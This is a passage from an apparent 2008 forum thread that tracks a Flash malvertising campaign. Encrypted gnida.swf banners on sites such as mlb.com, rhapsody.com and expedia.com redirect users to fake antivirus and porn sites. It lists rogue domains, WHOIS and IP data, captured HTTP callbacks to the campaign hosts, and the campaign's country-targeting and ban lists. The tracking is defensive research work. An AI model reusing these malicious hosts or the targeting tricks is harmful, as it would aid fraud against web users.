  121. Gubbishremover.com
  122. Hackerstaisaku.com
  123. Hadodoraibugado.com
  124. Harddriveguard.com
  125. Herramientasegura.com
  126. Historialout.com
  127. Hotbevakning.com
  128. Ingavirus.com
  129. Ingenmulighetforvirus.com
  130. Inhaltsaeuberung.com
  131. Inhaltspeicher.com
  132. Inmunepc.com
  133. Kakujitsutsuru.com
  134. Keinespurenlassen.com
  135. Keineviren.com
  136. Knowhowprotection.com
  137. Konsekiauto.com
  138. Kontentsufiruta.com
  139. Kurinkonseki.com
  140. Kyoiireza.com
  141. Kyoikanshi.com
  142. Kyoryokucleaner.com
  143. Largavidapc.com
  144. Laufwerkcleaner.com
  145. Libresystem.com
  146. Limpiapc.com
  147. Limpietodo.com
  148. Lomejorenantivirus.com
  149. Longlifepc.com
  150. Lungavitapc.com
  151. Maechtigerreiniger.com
  152. Malwareschutz.com
  153. Manutencaopc.com
  154. Memorisebu.com
  155. Menacecontrole.com
  156. Menacefighter.com
  157. Menacemonitor.com
  158. Menacescrubber.com
  159. Menacesprotection.com
  160. Miavcompleto.com
  161. Mightycleaner.com
  162. Minnesparere.com
  163. Monitordeamenazas.com
  164. Moteurpcpro.com
  165. Mycontentassistant.com
  166. Netsurfageassure.com
  167. Nettoyeurdepc.com
  168. Nettoyeurdeserreures.com
  169. Nettoyeurdevirus.com
  170. Nettoyeurpuissant.com
  171. Neuerantivirus.com
  172. Neuerschild.com
  173. Nientetracce.com
  174. Nouvelantivirus.com
  175. Nurdeinpc.com
  176. Ohnespurensurfen.com
  177. Omelhorantivirus.com
  178. Onlinehelpmate.com
  179. Onlineverktyg.com
  180. Onrainpurotekuta.com
  181. Ordureffaceur.com
  182. Oruripea.com
  183. Pasderreurs.com
  184. Pasdesfautes.com
  185. Pasdesmenaces.com
  186. Pasendommagement.com
  187. Pasplusdespertes.com
  188. Pasplusdevirus.com
  189. Pcantiviruspro.com
  190. Pcassertor.com
  191. Pcbewaker.com
  192. Pcboosterpro.com
  193. Pcbunan.com
  194. Pceternel.com
  195. Pcforfender.com
  196. Pchealthkeeper.com
  197. Pchjaelper.com
  198. Pcinforedder.com
  199. Pclibredevirus.com
  200. Pcohnespuren.com
  201. Pcprivacytool.com
  202. Pcredskab.com
  203. Pcsansbug.com
  204. Pcsecuresystem.com
  205. Pcsecurise.com
  206. Pcsentineru.com
  207. Pcsiemprenueva.com
  208. Pctoolpro.com
  209. Pcultralimpia.com
  210. Pcveiligheidstool.com
  211. Pcvirussweeper.com
  212. Perfektantivirus.com
  213. Personalityprotector.com
  214. Poseidonantivirus.com
  215. Poupememoria.com
  216. Preservingtool.com
  217. Privacidadconductor.com
  218. Privacidadgarantizada.com
  219. Privacidadyseguridad.com
  220. Privacyconductor.com
  221. Privacyredder.com
  222. Privacywaker.com
  223. Privacywarrior.com
  224. Privatsicherer.com
  225. Protecaoconfiavel.com
  226. Proteccionasegurada.com
  227. Proteccioncompleta.com
  228. Proteccionimperial.com
  229. Protecteurdinfo.com
  230. Protectionassuree.com
  231. Protectionconue.com
  232. Protectiondedriver.com
  233. Protectiondenetsurfage.com
  234. Proteggidati.com
  235. Protezioneesperta.com
  236. Protezionefidata.com
  237. Pulituraestrema.com
  238. Puraibashihosho.com
  239. Puraibashimaneja.com
  240. Puraibashitoshinrai.com
  241. Rendimientototal.com
  242. Rensanu.com
  243. Reparaerrores.com
  244. Reparateurdesysteme.com
  245. Repareja.com
  246. Reparemenaces.com
  247. Repareya.com
  248. Rimuoviciarpame.com
  249. Riparaminacce.com
  250. Riparasubito.com
  251. Riservatezzanet.com
  252. Safeharddrive.com
  253. Safepctool.com
  254. Safudaijoubu.com
  255. Salvaspaziosudisco.com
  256. Sansendommagement.com
  257. Sansinfections.com
  258. Sayonarabaggu.com
  259. Schijfbewaker.com
  260. Schijfcontroleur.com
  261. Schijfredder.com
  262. Schijfruimteredder.com
  263. Schutzderdaten.com
  264. Schutzfuerpc.com
  265. Schutztool.com
  266. Secretissimosoft.com
  267. Secretopertutti.com
  268. Secretosasalvo.com
  269. Secretoseguro.com
  270. Securepccleaner.com
  271. Sefunahimitsu.com
  272. Sekretessforsvarare.com
  273. Senzadoppioni.com
  274. Shingaidome.com
  275. Shinraihogo.com
  276. Shinraipafomansu.com
  277. Shisutemudifensu.com
  278. Sichererantivirus.com
  279. Sichererschutz.com
  280. Sicherheitstool.com
  281. Sikkerbrukere.com
  282. Sikkerpcredskap.com
  283. Sikkersystem.com
  284. Sinataques.com
  285. Sinrrastros.com
  286. Sinsenales.com
  287. Sistemaprotegido.com
  288. Sistemupyua.com
  289. Sisutemuantei.com
  290. Sisutemuorugurin.com
  291. Skyddsprogram.com
  292. Smittfri.com
  293. Solelunaantivirus.com
  294. Speichertool.com
  295. Spyguardpro.com
  296. Spywaretaisakumaster.com
  297. Stopbedreiging.com
  298. Stopminacce.com
  299. Storageprotector.com
  300. Succesantivirus.com
  301. Superanonimo.com
  302. Surfforsure.com
  303. Surfremover.com
  304. Sutoppuwirusu.com
  305. Syssauvegarde.com
  306. Systemerrorfixer.com
  307. Systemesansfaute.com
  308. Systemesansvirus.com
  309. Systemhoover.com
  310. Systemschild.com
  311. Tackanejvirus.com
  312. Tilforlatelig.com
  313. Toolsicuro.com
  314. Topsalgantivirus.com
  315. Trasheraser.com
  316. Trojansfilter.com
  317. Trusselovervagning.com
  318. Trustedantivirus.com
  319. Trustedprotection.com
  320. Tryggpcverktyg.com
  321. Trygpcbruger.com
  322. Turnkeyantivirus.com
  323. Unidadessanas.com
  324. Usuarioprotegido.com
  325. Utiledereparation.com
  326. Utilisateursur.com
  327. Vaktmotvirus.com
  328. Veiligheidsagent.com
  329. Virenvernichter.com
  330. Virusbekaemper.com
  331. Virusgarde.com
  332. Viruskrakker.com
  333. Virussperr.com
  334. Virusurimuva.com
  335. Virusvanger.com
  336. Virusvijand.com
  337. Volumformatredskap.com
  338. Wegvonviren.com
  339. Winanonymous.com
  340. Winpcdoctor.com
  341. Winsecureav.com
  342. Winspycontrol.com
  343. Wirusufinisshu.com
  344. Wirusuk.com
  345. Wirusukyua.com
  346. Wirusushattodaun.com
  347. Wirusushuryo.com
  348. Yourprivacyguard.com
  349. Yuzasefu.com
  350. Zentaiwakuchin.com
<h4>
24.244.171.69
</h4>
  1. 2greatfind.com
  2. 2quickfind.com
  3. Alg-search.com
  4. All-search-it.com
  5. Bestdatafinder.com
  6. Besteversearch.com
  7. Bi-bi-search.com
  8. Bucksbill.com
  9. Candid-search.com
  10. Cha-cha-search.com
  11. Cleanator.com
  12. Clever-at-search.com
  13. Deuscleaneronline.com
  14. Deuspayment.com
  15. Didosearch.com
  16. Fandasearch.com
  17. Fati-gati-search.com
  18. Favourable-search.com
  19. Feel-search.com
  20. Findbyall.com
  21. Firstbestsearch.com
  22. Firstlastsearch.com
  23. Fokus-search.com
  24. Force-search.com
  25. Fulsearch.com
  26. Glass-search.com
  27. Gt-search.com
  28. Ideal-search.com
  29. Individ-search.com
  30. Initial-search.com
  31. Kazilkasearch.com
  32. Loffersearch.com
  33. Londasearch.com
  34. Mad-search.com
  35. Myusefulsearch.com
  36. Nudesweetmature.com
  37. Ol-search.com
  38. Original-search.com
  39. Se7ensearch.com
  40. Search-and-win.com
  41. Search-angle.com
  42. Search-deal.com
  43. Search-expand.com
  44. Search-into.com
  45. Search-the-best.com
  46. Search-the-prey.com
  47. Search-west.com
  48. Searchcompleteness.com
  49. Searchmandrake.com
  50. Searchonline-ease.com
  51. Searchoperation.com
  52. Searchvirtuoso.com
  53. Simplesamplesearch.com
  54. Such-search.com
  55. The-same-search.com
  56. Treekindsearch.com
  57. Type-and-find.com
  58. Ultimatepayment.com
  59. Unicsearch.com
  60. Wewillfind.com
  61. Windfiresearch.com
<h4>
193.227.121.34
</h4>
  1. Superiordatingsite.com
  2. Surveypaiz.com
<h4>
24.244.170.178
</h4>
  1. statsgod.com
<h4>
Associated IP's (download centers)
</h4>
content.onerateld.com - 209.8.114.5

canonical name g1.panthercdn.com
Domain Name: ONERATELD.COM
Registrar: YESNIC CO. LTD.
Name Server: NS1.ONERATELD.COM
Name Server: NS2.ONERATELD.COM
Updated Date: 07-dec-2007
Creation Date: 26-dec-2006
Expiration Date: 26-dec-2008

sec.storageguardsoft.com - 209.8.114.8

canonical name g1.panthercdn.com
Domain Name: STORAGEGUARDSOFT.COM
Registrar: YESNIC CO. LTD.
Name Server: NS9.NSCACHE.NET
Name Server: NS8.NSCACHE.NET
Updated Date: 03-dec-2007
Creation Date: 07-dec-2006
Expiration Date: 07-dec-2008

<h4>
Other domains hosting gnida.swf
</h4>
aheadad.com - 205.252.251.18

Server Type: Apache/1.3.37 (Unix) PHP/5.2.3
IP Location - Alaska - Ketchikan - Beyond The Network America Inc
Reverse IP: 7 other sites hosted on this server.

::Domain servers in listed order::
ns2.ah-dns.com
ns1.ah-dns.com

::Dates & Status::
Creation Date: 12-Oct-2007
Expiration Date: 12-Oct-2008
Status:ACTIVE

Websites.
  1. Aheadad.com
  2. Fuckmomsladyfriend.com
  3. Gayfunworld.com
  4. Gayteenplace.com
  5. Hotfreebbw.com
  6. Onlyshemale.net
  7. Plumppornvideo.com
  8. Windowssecurecenter.com
Kimberly
Flash swf files hit the news again. Unfortunately this time were are not talking about redirects to fake spyware alerts but about getting redirected to a porn site with streaming video content.

An advertisement for Chanel watches hosted by ad.doubleclick and showed on The Official Site of Major League Baseball (mlb.com) is indeed redirecting people to hqtube.com.
The advert in question is ad.doubleclick.net/1674952/mlb_chanel.swf
IPB Image
Again you can find the culprit back by examining the HTTP refers when you enter the hqtube.com website. Furthermore hqtube.com sets a cookie containing a reference to the same ad.doubleclick swf file.
IPB Image
The user is also prompted to install the Chinese language pack when entering hqtube.com

IPB Image
Mlb.com has a page for people with slow connections. It doesn’t play the flash adverts. If you don’t want to block ads or disable Flash, use that link instead of the normal homepage. You won’t get redirected.

Narrow broadband link:
http://mlb.mlb.com/mlb/homepage/narrowband.jsp

Full story by Sandi Hardmeier.
MLB.COM users hijacked and redirected to pornographic web site, complete with graphic videos - DOUBLECLICK involved

<h4>
hqtube.com - 88.85.66.116
</h4>
Server Type: nginx/0.3.51
IP Location - Utrecht - Utrecht - Webazilla

Registration Service Provided By: Enom, Inc

Administrative Contact:
ICOO SOFT LTD
Vadim Fatkullin ()
+357.25341300
Fax: +357.25342030
Gladstonos 120-C2
Lemesos, 3032
CY

Status: Locked

Name Servers:
ns1.serverfield.com
ns2.serverfield.com
ns3.serverfield.com
ns4.serverfield.com

Creation date: 14 Aug 2006 14:42:05
Expiration date: 14 Aug 2008 14:42:05

Websites hosted on 88.85.66.116
  1. Filespray.com
  2. Hqtube.com
Kimberly
<h4>
newbieadguide.com - vozemiliogaranon.com - thetechnorati.com - akamahi.net - ?
</h4>
Time to update your IP blocks, the guys moved ...
IPB Image
91.199.50.14 - akamahi.net
91.199.50.15 - newbieadguide.com
91.199.50.16 - thetechnorati.com
91.199.50.17 - vozemiliogaranon.com
91.199.50.18 - ?

91.199.50.14 - 91.199.50.18

QUOTE
inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT
source: RIPE # Filtered

organisation: ORG-NDF1-RIPE
org-name: Netrouting Data Facilities
org-type: OTHER
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
abuse-mailbox:
mnt-ref: GFX-MNT
mnt-by: GFX-MNT
source: RIPE # Filtered

person: S Bout
org: ORG-NDF1-RIPE
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
nic-hdl: SBT10-RIPE
source: RIPE # Filtered

route: 91.199.50.0/24
descr: Netrouting Data Facilities
origin: AS16131
mnt-by: GFX-MNT
source: RIPE # Filtered
As always keep an eye on Sandi Hardmeier's blog too.
http://msmvps.com/blogs/spywaresucks/default.aspx
Kimberly
And the move keeps going on !

mysurvey4u.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities
Domain Name : mysurvey4u.com

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE

Websites
  1. Mysurvey4u.com
  2. Singlemetro.com
______________________________

traveltray.com - 194.110.67.23

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Name Servers::
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

::Dates & Status::
Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.
Domain status: clientTransferProhibited - clientUpdateProhibited

Websites
  1. Specificissue.com
  2. Traveltray.com
______________________________

netmediagroup.net - 84.243.252.91

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: netmediagroup.net is hosted on a dedicated server.

::Name Servers::
ns1.netmediagroup.net
ns2.netmediagroup.net

::Dates & Status::
Created Date 2006-06-29 05:38:33 EDT
Updated Date 2007-06-27 17:59:00 EDT
Valid Date 2008-06-29 05:38:33 EDT
Status ACTIVE
______________________________

traffalo.com - 84.243.252.94

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: traffalo.com is hosted on a dedicated server.

::Name Servers::
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252

::Dates & Status::
Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.
Domain status: clientTransferProhibited - clientUpdateProhibited
______________________________

uniqads.com - 84.243.252.97

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: uniqads.com is hosted on a dedicated server.

::Name Servers::
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251

::Dates & Status::
Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.
Domain status: ok

<h4>
Blocks
</h4>
inetnum: 84.243.221.0 - 84.243.221.255
netname: GFX-CUST-NETROUTING
descr: Netrouting Data Facilities
org: ORG-NDF1-RIPE
country: NL
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PA
mnt-by: GFX-MNT

inetnum: 194.110.67.0 - 194.110.67.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: GFX-MNT
mnt-routes: GFX-MNT
mnt-domains: GFX-MNT

inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT
Kimberly
<h4>
akamahi.net - newbieadguide.com - thetechnorati.com - vozemiliogaranon.com
</h4>
Time to update your IP blocks (again).

64.38.4.131 - akamahi.net
64.38.4.133 - newbieadguide.com
64.38.4.134 - thetechnorati.com
64.38.62.234 - vozemiliogaranon.com

64.38.0.0 - 64.38.63.255

QUOTE
OrgName: FastServers, Inc.
OrgID: FASTS-1
Address: 175 W. Jackson Blvd
Address: Suite 1770
City: Chicago
StateProv: IL
PostalCode: 60604
Country: US

ReferralServer: rwhois://rwhois.fastservers.net:4321/

NetRange: 64.38.0.0 - 64.38.63.255
CIDR: 64.38.0.0/18
NetName: FASTSERVERS-CF
NetHandle: NET-64-38-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.FASTSERVERS.NET
NameServer: NS2.FASTSERVERS.NET
Comment:
RegDate: 2005-07-12
Updated: 2006-03-22

== Additional Information From rwhois://rwhois.fastservers.net:4321/ ==

network:Class-Name:network
network:ID:64-38-62-232-29.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:64-38-62-232/29
network:IP-Network:64.38.62.232/29
network:Organization;I:CID-21976.64.38.0.0/18
network:Tech-Contact;I:
network:Admin-Contact;I:
network:Updated:20080111
network:Updated-By:

network:Class-Name:network
network:ID:FASTSERVERS-CF.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:CF-64.38.0.0
network:IP-Network:64.38.0.0/18
network:Organization;I:FastServers, Inc
network:Tech-Contact;I:
network:Admin-Contact;I:FASTS-ARIN
network:Created:20050913
network:Updated:20060322
network:Updated-By:


Resolve Host: server1.cpvadvertizing.com

A cpvadvertizing.com
PTR server1.cpvadvertizing.com
NS ns1.cpvadvertizing.com 85.17.4.1
NS ns2.cpvadvertizing.com 85.17.4.2
IP's using PTR to this host:
  • 64.38.4.130
  • 64.38.4.131
  • 64.38.4.132
  • 64.38.4.133
  • 64.38.4.134
  • 64.38.62.234
Kimberly
<h4>
Other domains hosting gnida.swf
</h4>
More Netrouting Data Facilities

workhomecenter.com - 194.110.67.25

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.WORKHOMECENTER.COM 190.15.73.251
NS2.WORKHOMECENTER.COM 190.15.73.252

::Dates & Status::
Record last updated on 22-May-2007.
Record expires on 28-Feb-2008.
Record created on 28-Feb-2002.
Domain status: ok

Websites.
  1. Theirtrade.com
  2. Workhomecenter.com
______________________________

casinoaceking.com - 194.110.67.19

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS2.CASINOACEKING.COM 190.15.73.252
NS1.CASINOACEKING.COM 190.15.73.251

::Dates & Status::
Record last updated on 10-Dec-2007.
Record expires on 09-Jan-2009.
Record created on 09-Jan-2002.
Domain status: ok

Websites.
  1. Casinoaceking.com
  2. Regularhelp.com
______________________________

getfreecar.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.GETFREECAR.COM 190.15.73.251
NS2.GETFREECAR.COM 190.15.73.252

::Dates & Status::
Record last updated on 05-Sep-2007.
Record expires on 07-Jul-2008.
Record created on 07-Jul-2003.
Domain status: ok

Websites.
  1. Getfreecar.com
  2. Singledaily.com
______________________________

gnida.swf is present on each of these domains.
Kimberly
In case you are curious how these redirects work, you can watch the video below. Unless explicitly clicked, most windows are closed using ALT+F4.
Note: Flash Player is needed.

IPB Image

The malicious banner on DiePresse.com is still active at the time of the writeup, so block or turn off Flash if you surf over there.
Kimberly
<h4>
www.rhapsody.com
</h4>
The campaign on DiePresse has been suspended but the banner is still hosted on their server. A new banner was reported recently on www.rhapsody.com. The redirect doesn't occur when you enter the site. Searching for music or artists brings up the malicious advert. The file is hosted at i.realone.com and it's again the skyauction banner as seen below.

IPB Image

CODE
Frame 265 (452 bytes on wire, 452 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: newbieadguide.com (190.15.64.188)
Transmission Control Protocol, Src Port: 1980 (1980), Dst Port: http (80), Seq: 1, Ack: 1, Len: 398
Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=mi1eroof HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf?
clickTag=http://ad.doubleclick.net/click%3Bh=v8/3652/3/0/%2a/x%3B177176445%3B0\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: newbieadguide.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf
Campaign: newbieadguide.com/statsa.php?u=23423424&campaign=mi1eroof

In meanwhile the bad guys kept on moving. They stayed a couple of days on Denit Internet Services in Amsterdam and now they are on the following IP's:

190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

QUOTE
% Joint Whois - whois.lacnic.net
% This server accepts single ASN, IPv4 or IPv6 queries


% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2008-01-25 15:11:36 (BRST -02:00)

inetnum: 190.15.64/20
status: allocated
owner: Secure Hosting Ltd.
ownerid: HN-SHLT-LACNIC
responsible: Secure Hosting Ltd.
address: Bufete Osorio, Edificio Palmira, --, 4th Floor
address: -- - Tegucigalpa - DC
country: HN
phone: +1 242 5028700 []
owner-c: RID2
tech-c: RID2
inetrev: 190.15.64/20
nserver: NS1.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
nserver: NS2.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
created: 20061006
changed: 20061006

nic-hdl: RID2
person: Richard Douglas
e-mail: support@SECUREHOST.COM
address: P.O. Box CB-13862, 00000,
address: CB13862 - Nassau - NP
country: BS
phone: +1 242 5028700
created: 20060127
changed: 20061006

% whois.lacnic.net accepts only direct match queries.
% Types of queries are: POCs, ownerid, CIDR blocks, IP
% and AS numbers.
Kimberly
<h4>
www.expedia.com
</h4>
This weekend we got some echoes about a malicious advertising banner on www.expedia.com. The campaign is very restrictive as most of the worldwide countries & continents are excluded. While visiting www.expedia.com, one advertising banner caught my attention though; the flash file was again protected /obfuscated using SWF Encrypt 4.x as seen below.
IPB Image
Thanks fly out to Cretemonster for confirming & checking out the advert since my geographic location is on the ban list.
CODE
Frame 44 (387 bytes on wire, 387 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1042 (1042), Dst Port: http (80), Seq: 1, Ack: 1, Len: 333
Hypertext Transfer Protocol
    GET /statsa.php?u=1200655836&campaign=pygmalioni HTTP/1.1\r\n
    Accept: */*\r\n
    Accept-Language: en-US\r\n
    Referer: http://media.expedia.com/ads/FXSound/728x90.swf\r\n
    x-flash-version: 9,0,115,0\r\n
    Accept-Encoding: gzip, deflate\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: media.expedia.com/ads/FXSound/728x90.swf
Campaign: quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni

If someone does experience those SWF hijacks / redirects on other websites, don't hesitate to PM me about it. This needs to be stopped !
Kimberly
A search did reveal the existence of quite a few new banners / redirects over the last 48h. We all need your help because those banners target specific countries and block others. Below is a partial list of reported redirects on forums. If you know which banners are causing the redirects below or if you did experience such fake alerts, please contact me or Sandi.

When an advertising banner is found or when new campaigns pop up, I'll update this topic.

quinquecahue.com/swf/gnida.swf?campaign=tautonymus&u=1201174352
  • Reported at www.webzdarma.cz forums.
  • Allowed Country Codes - States / Cities - IP Ranges
    CZ, UA
  • Banned Country Codes - States / Cities - IP Ranges
    89.250.0.0-89.250.255.255
    prague
IPB Image

CODE
Frame 387 (413 bytes on wire, 413 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1190 (1190), Dst Port: http (80), Seq: 1, Ack: 1, Len: 359
Hypertext Transfer Protocol
    GET /statsa.php?u=1201174352&campaign=tautonymus HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.wz.cz/bannery/firstchoice/firstchli.swf?clickthru=http://www.firstchoice.co.uk/?ref=A0991\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: i.wz.cz/bannery/firstchoice/firstchli.swf
______________________________

quinquecahue.com/swf/gnida.swf?campaign=atliverish&U=1200328388
  • Reported at eforum.idg.se.
  • Banned Country Code - States / Cities - IP Ranges
    85.18.0.0-85.18.255.255
    1.255.0.0-1.255.255.255
    7.3.0.0-7.3.255.255
    italy
    california, ohio
______________________________

quinquecahue.com/swf/gnida.swf?campaign=myrakehell&u=1200937882
  • Reported at trojaner-board.de and forum.chip.de
  • Allowed Country Codes - States / Cities - IP Ranges
    DE, AT, UA
  • Banned Country Code - City - IP
    88.198.0.0-88.198.255.255
    217.6.0.0-217.6.255.255
    dortmund, radibor, berlin
Banner was reported to be present at onlinetvrecorder.com in the downloads section (which needs membership). According to the forum moderator the banner has been removed...
______________________________

quinquecahue.com/swf/gnida.swf?campaign=teachingor&u=1200504042
  • Reported at www.index.hr
  • Banned Country Code - States / Cities - IP Ranges
    70.84.0.0-70.84.255.255
    70.85.0.0-70.85.255.255
    209.85.0.0-209.85.255.255
    in, il
    texas, california, newyork
    dallas, mountainview, newyork
______________________________

quinquecahue.com/swf/gnida.swf?campaign=ifsequitur&u=1200654870
  • Reported at www.bridicum.com (CSIS Security Group).
  • Banned Country Codes - States / Cities - IP Ranges
    195.47.0.0-195.47.255.255
    84.16.255.255
    copenhagen
______________________________

traveltray.com/swf/gnida.swf?campaign=upmorpheus&u=1201009699
  • Reported at forum.zeusnews.com - forum.ingegneri.info.
  • Banned Country Codes - States / Cities - IP Ranges
    217.12.0.0-217.12.255.255 (Yahoo Europe)
    216.109.0.0-216.109.255.255 (us.rd.yahoo.com - 216.109.118.82)
    66.94.0.0-66.94.25.255 (f3.yahoofs.com - 66.94.226.22)
    UK
    california
    milano, milan, london, dublin, barcelona
In different countries (France, Italy ...) people complain about SWF redirects in their mailbox. If you are a victim of this, please contact us.
______________________________

03/02/2008

mysurvey4u.com/swf/gnida.swf?campaign=me9ntthe&u=1201951156171
  • Reported at forums.myspace.com/p/3747055/37526266.aspx?fuseaction=forums.viewpost
  • www.myspace.com IP :
    216.178.39.14
    216.178.38.130
    216.178.39.16
    216.178.39.15
    216.178.39.74
    216.178.39.12
    216.178.39.11
    216.178.39.13
    216.178.38.131
    216.178.38.129
______________________________

quinquecahue.com/swf/gnida.swf?campaign=atticismus&u=1201712577
  • Reported at www.hispamp3.com/foros
______________________________

quinquecahue.com/statsg.php?u=1200592645&campaign=ofquixotic
  • Reported at www.gaiaonline.com/forum/questions-assistance/ad-banner-infected-with-gnida-swf-trojan/t.37232985/
  • The IP address of gaiaonline.com is 72.5.72.7, so 72.5.0.0-72.5.255.255 will be in the banned list.
______________________________
Kimberly
<h4>
IP Resume
</h4>
190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

190.15.73.254 - blessedads.com
______________________________

194.110.67.22 - mysurvey4u.com
194.110.67.25 - workhomecenter.com
194.110.67.19 - casinoaceking.com
194.110.67.22 - getfreecar.com
______________________________

84.243.252.94 - traffalo.com
______________________________

Changed.

content.onerateld.com - sec.storageguardsoft.com

66.244.254.11
66.244.254.201
66.244.254.239
85.17.4.101
QUOTE
Network Whois record
Queried whois.arin.net with "66.244.254.11"...

OrgName: Big Pipe Inc.
OrgID: BGPP
Address: Suite 400
Address: 630 - 3rd Ave. SW
City: Calgary
StateProv: AB
PostalCode: T2P-4L4
Country: CA

ReferralServer: rwhois://204.209.209.80:4321

NetRange: 66.244.192.0 - 66.244.255.255
CIDR: 66.244.192.0/18
NetName: BIGPIPE-2
NetHandle: NET-66-244-192-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.BIGPIPEINC.COM
NameServer: DNS2.BIGPIPEINC.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-03-14
Updated: 2002-05-21

RTechHandle: ZB106-ARIN
RTechName: Big Pipe Inc
RTechPhone: +1-403-750-7428
RTechEmail: ipadmin_bigpipe@bigpipeinc.com

OrgAbuseHandle: BPA15-ARIN
OrgAbuseName: Shaw Business Solutions - Abuse
OrgAbusePhone: +1-866-244-7474
OrgAbuseEmail: abuse@shawbusinesssolutions.ca

OrgTechHandle: ZI94-ARIN
OrgTechName: Shaw Business Solutions
OrgTechPhone: +1-403-750-7428
OrgTechEmail: ipadmin@shawbusinesssolutions.ca

# ARIN WHOIS database, last updated 2008-02-03 19:03
# Enter ? for additional hints on searching ARIN's WHOIS database.

QUOTE
Network Whois record
Queried whois.ripe.net with "-B 85.17.4.101"...

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
